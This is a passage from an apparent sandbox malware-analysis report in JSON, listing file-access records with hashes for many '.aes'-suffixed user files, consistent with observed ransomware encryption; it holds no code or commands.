"C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\vuewIfEOk\\c WNWiE5.gif.aes", "hashes": [ { "md5_hash": "accf228c234cf26a0c7d6fec048abcd4", "sha1_hash": "ccf01650ba62909974bed348fb6aeb60e995be11", "sha256_hash": "70215d5e16468252784d53a279e6780e5abb2bc1edf5ae0fed2569ed3f737e96", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\c wnwie5.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\vuewIfEOk\\ZFDojVkI.png.aes", "hashes": [ { "md5_hash": "34f09333c32178ec0fe4798c51fcdada", "sha1_hash": "abe1a5c67de5edd1db346df2bfdcd05a82250afa", "sha256_hash": "43558bbd5f66437caa2b7adc80601b6bf26762aaf5d66520d9224efe9bb0bf4b", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\vuewifeok\\zfdojvki.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\-4w-q4wd1z.bmp.aes", "hashes": [ { "md5_hash": "e73c10079a2f673d61f869badd8155fb", "sha1_hash": "18124af8d920518f38592e2e87343a3d0c7ee7c4", "sha256_hash": "a046acd6e3623ac61becbfe7961c335671bfaf60d2943faf4bf6a0e336f86bc2", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\-4w-q4wd1z.bmp.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\FS30OROMoJdbC.gif.aes", "hashes": [ { "md5_hash": "35dbd9ccfd154bfd175a0bd391b1c46a", "sha1_hash": "a4daf97345b04e6f0bf6a4c8e37a67ce7c7b5998", "sha256_hash": "8d54992fefddb06e6fc957fbc58f36d6d91aaf22370bdbbd91e5fda1e9b329f7", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\fs30oromojdbc.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\KFh DlKG2stAGLP.jpg.aes", "hashes": [ { "md5_hash": "935889cf8e562e318c55a318428be53c", "sha1_hash": "25f8e127cb515a948ce63f7931fc467221a3d945", "sha256_hash": "90662c22ebb11fccaa2708d2c14f73935ad6afa14e024d7b388f24546917149a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\kfh dlkg2staglp.jpg.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\kvHYSDZaY9p7NO8Z735z.png.aes", "hashes": [ { "md5_hash": "cf876d89a6b219a89ff528c392a3882e", "sha1_hash": "12aaed1360e522485fd7b34b628958ba2582885b", "sha256_hash": "52dffec88babf318b3e3bfec2cb9aed189ebf897603b68408bbf6ec4859d8bb5", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\kvhysdzay9p7no8z735z.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\w26w\\pFfH.bmp.aes", "hashes": [ { "md5_hash": "db4e3eff1935546dc91a789af941efa3", "sha1_hash": "7939f071be3f45b27bd129873892cbe634911507", "sha256_hash": "a4a84a386be06865ee264f976d92993f63b59076a90c9b8bb5f86ea9a9bc42dd", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\w26w\\pffh.bmp.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\HJ3HCKNndjhrdYoB.bmp.aes", "hashes": [ { "md5_hash": "d704b39e96ace1e9680656ecc41ba45c", "sha1_hash": "ed0559ea0ee77ea6a11d7bd466085f921d74b3d1", "sha256_hash": "352a7435112d013eee8f672dc51b6042087dab02bfd2522be179c51104c7c512", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\hj3hcknndjhrdyob.bmp.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\vGEj4z4hhmv\\IQ814T.jpg.aes", "hashes": [ { "md5_hash": "b075ff6bcc1398b5012471b78fe73559", "sha1_hash": "20d5e36608da2ec3333231e2662be9581753973d", "sha256_hash": "931f7fd054716f5dc4ef982b0cb2ef25b19354e62d65a242a53644e276eade1f", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\vgej4z4hhmv\\iq814t.jpg.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\e8B06t5z\\S-t1dx_AJ3.bmp.aes", "hashes": [ { "md5_hash": "cd66f4db85d6d442cfab2a5c809d6044", "sha1_hash": "36053b4cef0181f908d0bce466550e901a9dd24d", "sha256_hash": "7b7aaf9809e222428f8dce0044952ba34016038dbf9f5399ea487c3bdf5f4670", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\e8b06t5z\\s-t1dx_aj3.bmp.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\4Nz6FD 37UMclhfq6.gif.aes", "hashes": [ { "md5_hash": "7c7eddf376e72dd9ffe833b6678e7845", "sha1_hash": "0c72a25c7efdf2dca4cdccd965380006c103114b", "sha256_hash": "05f5a0b53b2c6143cb23b752152bace25bc73317202c06a52a7681489967ea0d", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\4nz6fd 37umclhfq6.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\dXFMoRUEzqjI.bmp.aes", "hashes": [ { "md5_hash": "eda7d48889d003792454783691b40d1e", "sha1_hash": "e263f59d1fe5f672071b040873641d4bcd52e6b2", "sha256_hash": "d5384697261e5ea0ae0b08fa7e970b39a231607e77a8f5fe002106bc4d7b6d7a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\dxfmoruezqji.bmp.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\IjyzG07WaZVWa6FxqH0.gif.aes", "hashes": [ { "md5_hash": "87b30b0b15565d24c76735a4018820ef", "sha1_hash": "50a55e8c82808d505cf6c2d1a5ae9dd21dd9343c", "sha256_hash": "43ec2359847c04335e7efe7e1a5c4bca7850fa10ad10c1e4bb7164b39e2b00da", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\ijyzg07wazvwa6fxqh0.gif.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\np ZA.bmp.aes", "hashes": [ { "md5_hash": "ed068736adf9db8ee6657e4efbc5aa23", "sha1_hash": "5210287477ea6dcffb0be3cd3eac2810b4e6562f", "sha256_hash": "4439fa657ed7847b2334dec7e1c792dc47e201ea13474fee9104dbe188330b25", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\np za.bmp.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Pictures\\OyPzZX.jpg.aes", "hashes": [ { "md5_hash": "18b383bfe85a0e38654727b470238b93", "sha1_hash": "edd8c503377dc0a4fff674ac97bf438de3955c90", "sha256_hash": "60731910cc92087ac13346df70511c935cb9987efcc22e3c9fcc72c65370a0e6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\pictures\\oypzzx.jpg.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6\\CQqMpg-jbIVE.wav.aes", "hashes": [ { "md5_hash": "2efecc5e09a806518caaaa451330e6d5", "sha1_hash": "d97403ff308b4ad8ba1b978147e1504614cfa88e", "sha256_hash": "c38f03bbbe51b548218be617dd167dc2575ce063bc4b27ab166894b0d4c94129", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\cqqmpg-jbive.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6\\EH1OC XshC.wav.aes", "hashes": [ { "md5_hash": "94c84b999e958e384632ddda2c11db87", "sha1_hash": "1cf64f860701da8e0d216300573966e7055447b2", "sha256_hash": "02b95f691723532fb8fedb43d457012dfa65f00b97514c65fc63ce7925387784", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\eh1oc xshc.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6\\jmrFGsOlm2gK_qf.wav.aes", "hashes": [ { "md5_hash": "972060ec2b90cc088faf2d3c9733b404", "sha1_hash": "8660c10575b687b3f467e6945403fb864910d454", "sha256_hash": "9a05ac5dc9ea31f97c46888f4d8385637ad3fc9aefc0f98c3585e555da3f39ba", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\jmrfgsolm2gk_qf.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\oGal6NmV2cY0e3 6\\MtD6XQw0JRc8h.wav.aes", "hashes": [ { "md5_hash": "79d31eb4c4c563d24f1231953abee005", "sha1_hash": "59c4b937a3f6dc01605767b2e7e958f56bd64937", "sha256_hash": "96aaa4cb45be0f173c54350bc5fa719095a2430f9068239821cc11f17e11c478", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\ogal6nmv2cy0e3 6\\mtd6xqw0jrc8h.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\D XgP5yxO\\zXoge.wav.aes", "hashes": [ { "md5_hash": "41e75f67da25ed6018e480c4a003b804", "sha1_hash": "c341245f06e806417ce4cb14d9630c66689058ee", "sha256_hash": "35fbf8a4a72082edc4decf7569ef131538217631f81ff381ba03dca2d2daf28a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\d xgp5yxo\\zxoge.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\B95U.wav.aes", "hashes": [ { "md5_hash": "375a9e6c894010cba93ad55981c3fd67", "sha1_hash": "398a5cac8fa575f8230ce2ea3e6f7fb8088606af", "sha256_hash": "7aa20a99de140edc4aaa49a3cf052fe3adafd442872060d97a2fcbb595bc4cd0", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\b95u.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\M9qFpAQ6hssl8wHB.wav.aes", "hashes": [ { "md5_hash": "93bbc1027ecb8600c30338a0bd6bb267", "sha1_hash": "7afa897ee034ace147a6209cab4c25849b2b76a1", "sha256_hash": "2e2b399a6cb1a24ac8b79ab42acb7eb97bcf64b62d5616d15fc65f7542f5be0c", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\m9qfpaq6hssl8whb.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\MMTRDLYGm.wav.aes", "hashes": [ { "md5_hash": "ff6a626834c39acd8b578140989dd65c", "sha1_hash": "5152e4b8edaa66f4a95f01f34fd86c044a92fd12", "sha256_hash": "60107d665f32d86edcdbe66b2323390fab3c5d50ba12dbec8aee5817dc0df7c7", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\mmtrdlygm.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\clNOjUrNMvl\\om RIMvMjXnxZplIa-.wav.aes", "hashes": [ { "md5_hash": "72d78ded59ae878ea4bf66aaf78ae1ac", "sha1_hash": "23e7b55c913b17a10f66cfb8df3c89775e0a093a", "sha256_hash": "30a39fb8026cb096391441ff073213851d2141a98847ba7e56665c42e40e2564", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\clnojurnmvl\\om rimvmjxnxzplia-.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\bdvGDQlhD8Y.wav.aes", "hashes": [ { "md5_hash": "cc4291ec28c66d69c59c06c6aba3675d", "sha1_hash": "4b8c771ca03fdd214a9018cbf682ef90bd8c4021", "sha256_hash": "eb0157558b237bc62b6fe486e84127279df47897ddfe6b484c94e1fdfcc21e65", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\bdvgdqlhd8y.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\sPKPdtJk\\ldkH5kxqMk43.wav.aes", "hashes": [ { "md5_hash": "bdd540c16de9535056c5acae807106f3", "sha1_hash": "4f6184f38ebe65124388686046e341af605cf85f", "sha256_hash": "7a0747a2d9c308cbf5d25572254a213c1dd94e8c4da6612fe3451e92cdbcf3d6", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\spkpdtjk\\ldkh5kxqmk43.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\BPwDqBd367v5jCWf.wav.aes", "hashes": [ { "md5_hash": "004d812c19245dee58e0966f07c82683", "sha1_hash": "3a623a42aea5506b6b4ed66deec1c8e37b3dc388", "sha256_hash": "ff15aef5260061fd34a206741226ca440858a0ca77e6cac95029c9113d236ca5", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\bpwdqbd367v5jcwf.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\e1mt wOaqipijv7EcVN\\LbtiEV6ysxhhXCJQ.wav.aes", "hashes": [ { "md5_hash": "ef56213a2a03b2ca546d2ef53b0a62be", "sha1_hash": "588d88ed499093351870ac786c1819561d98b2fa", "sha256_hash": "d4e4eaacb58db4e60522f8bea5059da6c1819ce6dd752f7a7230231cbeaf91fe", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\e1mt woaqipijv7ecvn\\lbtiev6ysxhhxcjq.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\gIud.wav.aes", "hashes": [ { "md5_hash": "d2c9aa40567cf701ab262bf9de7b274b", "sha1_hash": "1f66c9eaeb6805c77bb7d9fede3d0596a0e189b7", "sha256_hash": "972fd9ff136dd087ff14080fa536b8c7d0d1cd57e07d853b0d7823e9033c8d34", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\giud.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Music\\QNSMQvCMaaiUq5u.wav.aes", "hashes": [ { "md5_hash": "47dbedc3579d6becea21d1ffa85c2601", "sha1_hash": "d9748dbd27a38e79df1cea8c7e28045605e6d811", "sha256_hash": "bffbcaf6dc814d8f52b19633d932741a8e614208b9a062822212d570bb635372", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\music\\qnsmqvcmaaiuq5u.wav.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\Eyqf5KSeCaMN6njljm\\y3M6CHiHDf_Yy2sBAzE.avi.aes", "hashes": [ { "md5_hash": "8cb41d5769de0ef8ed58a0591665a0fb", "sha1_hash": "f766e8b3d61ee15682596a452ea6fdaf2e993572", "sha256_hash": "c17714f62ca6507b7140d1a149d0ed4de6ab22e83568e8de097cc68ecaa02d24", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\eyqf5ksecamn6njljm\\y3m6chihdf_yy2sbaze.avi.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\LNVGgurmVCVr5ekCq-4\\eJvtTMxbiz6SbBueW.swf.aes", "hashes": [ { "md5_hash": "35cf8461c521d8b60e72db3289ebe26e", "sha1_hash": "3e0753ed78b934c999f2da4359201367e3079bec", "sha256_hash": "6d30d89a3ea636f513a26e417e04ac83b1a2c70bf33b8713cba90238aec240e2", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\lnvggurmvcvr5ekcq-4\\ejvttmxbiz6sbbuew.swf.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\LNVGgurmVCVr5ekCq-4\\xSTC7qezlhs _STE0B.avi.aes", "hashes": [ { "md5_hash": "415d10e3d9a949f0a80cfbacaea7f908", "sha1_hash": "820c14506371195fa958c06d6c56f29107e5a7a5", "sha256_hash": "5d2e2c703a5a3c3f29bf8c8727f9ba356145bd8a1ffd860a65e99fc727bd7edb", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\lnvggurmvcvr5ekcq-4\\xstc7qezlhs _ste0b.avi.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\WQHnOCgB21aCcC\\4M2T-htfvXV73.swf.aes", "hashes": [ { "md5_hash": "51e33bc6bca3efb60b4dea404216463f", "sha1_hash": "96338c13c8dd8f19f5e9c90f8752ac85225511b6", "sha256_hash": "62698be77f2cbafe68adfe06dba77037ee05869b8b818affd83fd24e377a510a", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\wqhnocgb21accc\\4m2t-htfvxv73.swf.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\-VerO sQDwv.avi.aes", "hashes": [ { "md5_hash": "d41d8cd98f00b204e9800998ecf8427e", "sha1_hash": "da39a3ee5e6b4b0d3255bfef95601890afd80709", "sha256_hash": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\-vero sqdwv.avi.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\TRj26cC8jkp.flv.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\trj26cc8jkp.flv.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\5rxjC 2TW9I2cmhDLv\\uBDJLyCr8A-TTa.mp4.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\5rxjc 2tw9i2cmhdlv\\ubdjlycr8a-tta.mp4.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86", "hashes": [], "norm_filename": "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Start Menu", "hashes": [], "norm_filename": "c:\\users\\all users\\start menu", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Sun", "hashes": [], "norm_filename": "c:\\users\\all users\\sun", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Sun\\Java", "hashes": [], "norm_filename": "c:\\users\\all users\\sun\\java", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Sun\\Java\\Java Update", "hashes": [], "norm_filename": "c:\\users\\all users\\sun\\java\\java update", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\All Users\\Templates", "hashes": [], "norm_filename": "c:\\users\\all users\\templates", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz\\7X-GM.flv.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\7x-gm.flv.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz\\l1V__tJSHnXI.avi.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\l1v__tjshnxi.avi.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz\\ppcN9b5Q ExH-k00.avi.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\ppcn9b5q exh-k00.avi.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\IjyI ku9gKWYYPFGATz\\zWeITqPQ 5L.mp4.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\ijyi ku9gkwyypfgatz\\zweitqpq 5l.mp4.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL\\4wDnaCEpKp.swf.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\4wdnacepkp.swf.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL\\dew6BPRQzNyZf.mp4.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\dew6bprqznyzf.mp4.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL\\fcAcCQTQF.mp4.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\fcaccqtqf.mp4.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\r-_fU8vdku2TwrL\\J2AjPHasg.mp4.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\r-_fu8vdku2twrl\\j2ajphasg.mp4.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\empW-4AlIY3p9Rubm.mp4.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\empw-4aliy3p9rubm.mp4.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\jJRuTZgC0AQOiwVU.flv.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\jjrutzgc0aqoiwvu.flv.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\extoA\\pI8CT7hfK.avi.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\extoa\\pi8ct7hfk.avi.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Videos\\TydhicM2z.flv.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\videos\\tydhicm2z.flv.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh\\1LWQeuU.xls.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\1lwqeuu.xls.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh\\8ir7B9DO0uh.png.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\8ir7b9do0uh.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh\\SakdPF0XTjzY.png.aes", "hashes": [], "norm_filename": "c:\\users\\kft6utqw\\desktop\\1zxeg6xm\\cnh\\sakdpf0xtjzy.png.aes", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\kFT6uTQW\\Desktop\\1ZxEG6XM\\cNh\\y48XZ.pdf", "hashes": 